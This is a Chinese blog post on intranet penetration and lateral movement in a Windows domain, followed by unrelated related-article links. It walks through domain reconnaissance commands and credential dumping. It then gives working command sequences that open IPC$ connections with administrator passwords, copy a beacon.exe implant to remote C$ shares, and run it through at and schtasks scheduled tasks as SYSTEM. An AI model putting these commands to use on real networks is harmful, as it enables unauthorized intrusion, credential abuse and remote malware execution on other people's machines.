当前位置: 首页 > news >正文

内网渗透横向移动1

1.信息收集

(1)判断域控

shell net time /domain

shell ping OWA2010CN-God.god.org

(2)主机探测

浏览探测->网络探测

主机列表显示:

(3)域用户收集:
shell net user /domain

(4)密码抓取

凭证提取->抓取hash/抓取明文密码

2.at命令横向移动

net use \\192.168.3.21\ipc$ "Admin12345" /user:god.org\administrator  #建立ipc连接

copy beacon.exe \\192.168.3.21\c$#拷贝执行文件到目标机器

at \\192.168.3.21 15:47 c:\beacon.exe#添加计划任务

3.schtasks >=Windows2012

net use \\192.168.3.32\ipc$ "admin!@#45" /user:god.org\administrator#建立ipc连接

copy beacon.exe \\192.168.3.32\c$ #复制文件到其C

schtasks /create /s 192.168.3.32 /ru "SYSTEM" /tn beacon /sc

DAILY /tr c:\beacon.exe /F #创beacon任务对应执行文件

schtasks /run /s 192.168.3.32 /tn beacon /i #运行beacon任务

schtasks /delete /s 192.168.3.21 /tn beacon /f#删除beacon任务


http://www.mrgr.cn/news/77929.html

相关文章:

  • mongodb安装并设置用户验证登录
  • 华为路由器、交换机、AC、新版本开局远程登录那些坑(Telnet、SSH/HTTP避坑指南)
  • css出现边框
  • Java 模板变量替换——字符串替换器(思路Mybatis的GenericTokenParser)
  • 设计模式学习笔记——结构型模式
  • ESP32 IDF VScode出现头文件“无法打开 源 文件 ”,并有红色下划线警告
  • Redis设计与实现 学习笔记 第二十一章 排序
  • 【Java】Linux、Mac、Windows 安装 Oracle JDK
  • Android 常用命令和工具解析之内存相关
  • 深入解析自适应控制算法及python实现
  • 深入解析自校正控制(STC)算法及python实现
  • Flink转换算子——flatMap/map/filter/keyby/reduce综合案例
  • git使用教程
  • Python学习------第十一天
  • 小白学多线程(持续更新中)
  • 数据结构 (5)栈
  • TCP socket api详解
  • Android 常用命令和工具解析之GPU相关
  • 数字信号处理(Digital Signal Procession)总结
  • 从搭建uni-app+vue3工程开始
  • Linux高阶——1117—TCP客户端服务端
  • HarmonyOS:使用ArkWeb构建页面
  • 工具学习_Docker
  • 用Tauri框架构建跨平台桌面应用:1、Tauri快速开始
  • 学习python的第十三天之函数——函数的返回值
  • 如何使用docker、docker挂载数据,以及让docker使用宿主机器的GPU环境 + docker重启小妙招